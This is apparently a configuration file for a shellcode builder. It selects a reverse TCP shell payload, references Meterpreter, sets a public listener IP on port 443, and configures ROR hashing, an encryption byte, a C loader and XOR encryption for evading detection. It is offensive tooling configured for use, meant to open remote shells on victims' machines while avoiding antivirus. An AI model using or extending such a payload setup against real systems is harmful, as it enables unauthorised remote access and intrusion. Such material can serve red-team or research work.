[Payload]
filename=shell_tcp.nasm
# filename=message_box.nasm

# SHELL & METERPRETER
# lhost=10.161.114.127
lhost=37.114.41.46
lport=443

# working:13,17,23
ror_value=17

# unique BYTE, need to implement simple syntax check
encryption_byte=0xa7

[Loader]
filename=loader.c

[Encryption] # - not implemented yes
# xor,aes,dict 
system=xor

# xor_key=0xf0


